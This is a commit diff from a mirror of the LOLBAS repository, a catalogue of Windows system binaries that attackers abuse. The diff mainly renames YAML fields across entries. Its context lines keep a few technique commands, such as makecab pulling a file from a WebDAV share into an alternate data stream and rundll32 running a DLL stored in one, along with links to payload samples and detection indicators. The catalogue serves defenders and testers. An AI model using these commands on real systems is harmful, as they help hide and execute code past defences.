mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-26 20:22:24 +02:00
Major changes to Web portal - Small fixes to source files to adjust
This commit is contained in:
Oddvar Moe
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bash.exe
|
||||
- Path: C:\Windows\SysWOW64\bash.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bash.exe
|
||||
|
||||
@@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bitsadmin.exe
|
||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bitsadmin.exe
|
||||
|
||||
@@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1140
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certutil.exe
|
||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Certutil.exe creating new files on disk
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1078
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Usage of this command could be an IOC
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1191
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1196
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\control.exe
|
||||
- Path: C:\Windows\SysWOW64\control.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Control.exe executing files from alternate data streams.
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cscript.exe
|
||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Cscript.exe executing files from alternate data streams
|
||||
|
||||
@@ -12,12 +12,12 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows server
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\diskshadow.exe
|
||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from diskshadow.exe
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1035
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1035
|
||||
OperatingSystem: Windows server
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Dnscmd.exe
|
||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Dnscmd.exe loading dll from UNC path
|
||||
|
||||
@@ -44,10 +44,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\esentutl.exe
|
||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -28,10 +28,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Expand.exe
|
||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||
- Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||
|
||||
@@ -28,10 +28,10 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\extrac32.exe
|
||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1185
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1185
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\findstr.exe
|
||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: finstr.exe should normally not be invoked on a client system
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\forfiles.exe
|
||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\gpscript.exe
|
||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scripts added in local group policy
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\hh.exe
|
||||
- Path: C:\Windows\SysWOW64\hh.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
||||
|
||||
@@ -12,12 +12,12 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ie4unit.exe
|
||||
- Path: c:\windows\sysWOW64\ie4unit.exe
|
||||
- Path: c:\windows\system32\ieuinit.inf
|
||||
- Path: c:\windows\sysWOW64\ieuinit.inf
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: ie4unit.exe loading a inf file from outside %windir%
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -20,12 +20,12 @@ Commands:
|
||||
MitreID: T1118
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -15,7 +15,7 @@ Commands:
|
||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Hide data compressed into an alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@@ -28,10 +28,10 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\makecab.exe
|
||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Makecab getting files from Internet
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mavinject.exe
|
||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||
|
||||
@@ -7,7 +7,7 @@ Commands:
|
||||
- Command: Microsoft.Worflow.Compiler.exe tests.xml results.xml
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||
Usecase: Compile and run code
|
||||
Category: Execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
@@ -28,9 +28,9 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows 10S
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10 (and possibly earlier versions)
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mmc.exe
|
||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -20,14 +20,14 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||
|
||||
@@ -12,9 +12,9 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msconfig.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||
Detection:
|
||||
- IOC: mscfgtlc.xml changes in system32 folder
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Msdt.exe
|
||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1170
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mshta.exe
|
||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||
Detection:
|
||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||
|
||||
@@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: msiexec.exe getting files from Internet
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\odbcconf.exe
|
||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -28,9 +28,9 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcalua.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -12,9 +12,9 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcwrun.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Presentationhost.exe
|
||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -28,10 +28,10 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\print.exe
|
||||
- Path: C:\Windows\SysWOW64\print.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Print.exe getting files from internet
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\reg.exe
|
||||
- Path: C:\Windows\SysWOW64\reg.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: reg.exe writing to an ADS
|
||||
|
||||
@@ -20,12 +20,12 @@ Commands:
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regasm.exe executing dll file
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regedit.exe
|
||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regedit.exe reading and writing to alternate data stream
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvcs.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1117
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvr32.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regsvr32.exe getting files from Internet
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\replace.exe
|
||||
- Path: C:\Windows\SysWOW64\replace.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Replace.exe getting files from remote server
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rpcping.exe
|
||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -47,7 +47,7 @@ Commands:
|
||||
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
||||
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Execute code from alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@@ -60,10 +60,10 @@ Commands:
|
||||
MitreID:
|
||||
MitreLink:
|
||||
OperatingSystem: Windows 10 (and likely previous versions)
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\runonce.exe
|
||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
- Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Event 4014 - Powershell logging
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
